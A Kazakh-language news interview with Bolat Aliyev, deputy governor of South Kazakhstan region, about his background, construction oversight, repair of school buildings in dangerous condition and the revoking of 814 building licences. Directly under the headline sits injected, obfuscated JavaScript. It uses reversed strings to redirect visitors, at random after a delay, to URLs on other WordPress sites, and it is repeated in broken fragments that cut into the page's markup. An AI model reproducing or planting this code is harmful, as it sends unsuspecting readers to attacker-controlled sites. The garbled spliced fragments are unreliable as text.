ОҚО әкімінің орынбасары Болат Әлиев: «Білсем, атқарсам, орындасам»

alyev$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/111.jpg» height=»153″ width=»231″ />Шындығы керек, «қалқайып» жүрген басшы азаматтар жайлы жазуға келгенде кібіртіктейміз, жариялауға келгенде баспалар «бас жаққа» барғысы келмей іркіліп қалады. Есесіне «біреудің бірдемесін» біліп қалсақ, жабыла келіп жамандаймыз, жақсы ма, жаман ба осындай бір үрдіс бар қазір қазақ баспасөзінде. Жамандадық, нәтижесі не болды дегенге келгенде тағы іркілеміз.
Неге екенін, жақсыны айтудан  жасқанамыз.
Сәуірдегі сайлаудан кейін Президент Нұрсұлтан Назарбаев кеңейтілген мәжіліс өткізіп, мемлекет деңгейі мен халықтың жағдайын жақсартудың алдағы бес жылының міндеттерін саралап берді. Мәжілісте кадрлық саясат мәселесіне жаңа мағынада ерекше мән беру керектігі үлкен сынмен, қатаң айтылды.
Жалпы  кадр саясаты жайлы осы айтылған сөздерден кейін біз соңынан жақсы да, жаман да сөз ерген  бір басшы азамат жайлы ойландық. Қазақ барым осы деп , айтып салатын мінезден де кенде емес. Осыған салып, сұрағымызды сайладық. Бір облыстың барлық күрделі  құрылысының  өзекті мәселелерінің шешілуі мен  ойдағыдай орындалуын, жылт еткен  жаңалықтарын кейіпкеріміздің  жеке басына  теліп, иығына артуды да  біржақты етпей, барды бар, жоқты жоқ деген азаматтық позициямыздан аттамай,  ақиқат әңгіме қозғауды ғана  жөн санадық.
    
-Сіз туралы баспасөз беттерінде жаман да айтылды, бірақ қазір «Болекеңнің тапсырмасы,  Болекең айтқан еді, Болекеңнің ұсынысы ғой» деген сыпайы сөздерді жиірек еститін болдық. Пікірдің бұлай өзгеруіне не себеп деп ойлайсыз?
-Жұмыс жүріп жатқан жерде түрлі пікір айтылады, біреудің ойлағаны бола қоймайды ол жамандайды, ал, біреу қарсы шығады, бірақ мұның бәрі  әркімнің дейгейіндегі  адами қатынасқа байланысты орын алады, егер кәсіби , тікелей жұмысқа қатысты болса басқаша болар еді. Сондықтан мен ондай жағдайлардың болуы заңды деп қабылдаймын. Кейде артық сөз өзіңді ақтап алу үшін, жұмысыңның  бар екенін көрсету үшін айтыла ма  деп те ойлайтын болдым.
-Ер жігіттің басынан не өтпейді дейсіз ғой, дегенмен ойыңыз  қызық екен, неге?
-Біздің  жұмысымыз қарбалас, күнделікті кестеге тізіліп қойған міндетті атқарып жүріп, кейбір жайттарды кейінге ысырып қоя бересің, кейде оны керек емес деп табасың  сен туралы артық сөз айтыла бастағанда  сол тірліктерді жедел қолға алып, орын-орнымен қойып түсіндіруге тура келеді.
-Өзіңіз сыпайылап жеткізіп отырған артық сөздердің айтылу себебі неде деп ойлайсыз?
-Талапшылмын, содан болар.
-Сізге мінезді, іскер, инициативашыл деген бағалар да беріліп жатады, осыны  көзбе-көз келіп айтатындар бар ма, мақтауды көп есітесіз бе?
-Қызметте  отырған соң барлық жағдайлар кездесіп жатады. Бірақ менің принципім сырт көзге сенуге болады. «Сырт көз- сыншы» деген сөз бекер айтылмаған. Сырт көз солай деп жатса, иланамын және өзіме артылған сенім деп қабылдаймын. Оны  атқарып отырған жұмысым арқылы дәлелдеуге  барымды саламын. Созақ ауданында туып, өстім. Әкемді ел таниды, тағылымды сол әкемнің тәрбиесінен алдым. Асқар таудай пана тұттым, арқа сүйедім, бірақ абыройы мен атағын пайдаланған емеспін.
-Сізді мектеп бітірген соң, жоғарғы оқу орнына емес, орта арнаулы оқу орнына түскен дейді. Бұл өзіңіздің біліміңізге деген сенімсіздіктен бе, жоқ басқа да себептері бар, олай деп отырғанымыз сол кездерде лауазымы бар адамдардың балаларының бәрі дерлік айтулы оқу орындарын тәмамдаған…
-Біліміме сенбедім деп айта алмаймын, таңдауым солай болды. Алматыдағы мемлекеттік банктің есеп-кредит техникумын  бітірген соң елге оралдым, жұмықа тұрдым, мерзімі келіп  әскери борышымды Ашхабадта өтеп қайттым. Келгеннен соң Созақ ауданында өз мамандығыммен, қаржы саласында жұмысымды жалғастырдым. Тәжірибе мен білім күнделікті жетілдіруді талап етеді. Сондықтан білімді қай кезде алғаның маңызды емес, ал жинақталған тәжірибенің орны бөлек. Одан кейінгі жылдары көлік –транспорт саласындағы жауапты қызметте болдым, 2007 жылы   облыстық жолаушылар көлігі  және  автомобиль жолдары басқармасының бастығы қызметін атқардым.  2009 жылдан облыс әкімінің  құрылыс істері жөніндегі орынбасарлығына тағайындалдым.
— Бұл қызметті сізге дейінде бірқатар азаматтар абыройлы атқарды. Бірақ әр басшының  өзіндік жұмыс әдісі, қолтаңбасы бары белгілі.  «Әлиев несімен ерекшеленді?»деп сұрасақ….
-Мен қызметке елімізде құрылыс қарқынмен жүріп жатқан кезде келдім. Бұл жұмыстардың жаңашылдығы да ерекшелігі де көп. Біткен іс туралы айтар болсақ, облыс әкімі Асқар Мырзахметовтың  бастамасымен әлеуметтік нысандарды зерттеу нәтижелі аяқталды. Өңірде апатты жағдайдағы 62 мектеп анықталып, оның  45-інің  жұмысы өткен жылы басталып, 22-сі аяқталды.  Былтырға жоспарланған құрылыс нысандарының  жобалау  — сметалық құжаттарын қайта қарау, сараптамадан өткізу нәтижесінде  үлкен көлемде қаржы  үнемделді. Осы үнемделген қаржы  бізге  апатты нысандар жұмысын жүргізуге  мүмкіндік берді.  Облыс әкімінің  құрылыс салаларындағы қаржы ысырабына жол бермеу жөніндегі бастамасы  мен  облыстағы  оған  қол жеткізудегі  табыстарымыз  бүкіл елімізде  кең қолдауға ие болды.  Бұл жөнінде  Елбасының өзі  ерекше атап өтіп,  біздің облысты өзгелерге үлгі етіп ұсынды.  Қазір Президенттің Шымкентті тәуелсіз еліміздегі үшінші қалаға айналдыру жөніндегі тапсырмасына  орай облыс орталығы мен  аумағында қарқынды құрылыс жұмыстары жүруде. Мұның барлығы еліміздің ертеңінің жарқын, келешегінің кемел  болуына  қаланып жатқан  негіз. Сондықтан   осы игілікті істердің әрқайсысында менің де қолтаңбам бар деп есептеймін. Ал, ерекшелегін  егер облыста келіп кеткен  әр басшының ерекшелігін  зерттеп-зерделеп, сараптап жүргендер болса, солар айта жатар. Мен бүгінгі шыққан биігімді, ертеңімнің өлшемі деп қабылдамаймын.  «Білсем, атқарсам, орындасам», менің ұстанымым осы.
-Құрылыс саласында өткізілетін тендерлерге байланысты дау-дамай көп. Сапасыз салынған құрылыс ешкімге абырой әпермейді, осы бағытта атқарылып жатқан жұмыстар бар ма?
Жасыратыны жоқ бұрындары мүмкіндігі бар ма, жоқ па оған қарамастан, әйтеуір аты бар компаниялар лицензия алып алатын да   тендерге қатыса беретін.  Қазір олардың қатары азайып келеді.Лицензия алудан қолында білікті  инженерлік – техникалық қызметкерлерінің штаты, еңбек ресурстары бар, құрылыс және  автотехникасы жеткілікті, құрылыс алаңдары мен  тиісті өндіріс  базасы бар онымен қоса өндіріс пен  қызметкерлерінің сапалық деңгейін жетілдірумен айналысатын, бәсекелестікке қабілетті  құрылыс компаниялар ғана үміттене алады.  Ал, бұған дейінгі  орын алған  кемшіліктер облыс әкімінің тапсыруымен  сәулет-құрылыс мемлекеттік бақылау  басқармасы арқылы мұқият сараланып, заңсыздықтардың беті  ашылып келеді. 2009 жылдың  шілдесінен бастап,  2011 жылдың сәуіріне дейінгі тексеру қорытындысы  бойынша  814 лицензия  кері қайтарылды. Осы ретте  кейбір құрылыс компаниялары басшыларының өз мүмкіндіктерін саралап,  алған  нысандарына  шамасы жетпейтіндігін біліп,  ары қарай жұмыс істеуден  ерікті түрде бас тартқандығын да айта кеткен жөн.
Былтыр облыста лицензия алушылардың  деректерінің электронды  базасын қалыптастырып,  жетілдіру мақсатында бес бағыттық «Нарықты тазалау» бағытының алғашқысы – лицензиялық адалдыққа  байланысты  электронды база  құрылып, қызмет түрлері,  өндірістік базалар,  техника,  есеп тапсыру мен  жалға беру мерзімдері бойынша лицензияны  мониторинг  жүргізуге мүмкіндіктер жасалды.
-Болатбек Нажимеденұлы, сізді «ұйықтамайтын басшы» дейтіндер де бар екен. Тынышсыз болғаныңыз ғой.
— Басшы  болу – үстелін  тоқпақтап, қарлыға айқайлап,  үстемдігін орнатып,  айналасындағыларды  айтқанына көндіріп, айдауына  жүргізу емес. Оның да әртүлі әдіс-тәсілі бар. Бір саланың қозғаушы күшіне айналу үшін сен тынымсыз жаңа өзіңіз айтқандай «тынышсыз» болуың керек.  Тынышсыздық дегенде мен ізденуді,  жұмыс істеуді, жауапкершілікті  айтып отырмын. Бойымда тынымсыздық бар екенін жасырмаймын. Бірақ   өзгеге қояр  талапты, тапсырманы  алдымен өзіме қоямын, өзімнен сұраймын. Адамның  істегенін адам істей алады. Жұмысты жүргізі үшін талап ете білу керек. Кейде күтпеген жерден шешім қабылдауға тура келіп жатады. Бұл жұмыс, өмірдің өзі тынымсыз бір қалыпта тұрған жоқ , сондай жағдайда қалай бейғам отыруға болады?…
-Әңгімеңізге рахмет!    
                                                                        

  Жанәбіл САБАЕВ,
                                                                                 заңгер.{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика